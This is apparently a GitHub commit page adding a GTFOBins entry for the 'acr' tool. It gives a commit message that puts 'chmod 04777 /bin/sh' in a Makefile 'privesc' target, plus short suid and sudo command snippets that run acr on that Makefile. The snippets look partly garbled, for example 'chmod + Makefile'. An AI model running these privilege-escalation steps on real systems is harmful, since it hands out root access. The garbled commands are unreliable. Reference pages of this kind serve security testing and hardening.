GTFOBins.github.io/_gtfobins/acr.md
Albert Llimós 15eb4b376a
Create acr.md
Inside the Makefile :
privesc: 
chmod 04777 /bin/sh

But there is another possibilities, the command above is how i did it
2024-05-02 14:18:58 +02:00

342 B

functions
suid sudo
code
sudo install acr $(which acr) . touch Makefile && chmod + Makefile echo DATA > Makefile ./acr -r Makefile
code
sudo install acr $(which acr) . touch Makefile && chmod + Makefile echo DATA > Makefile sudo acr -r Makefile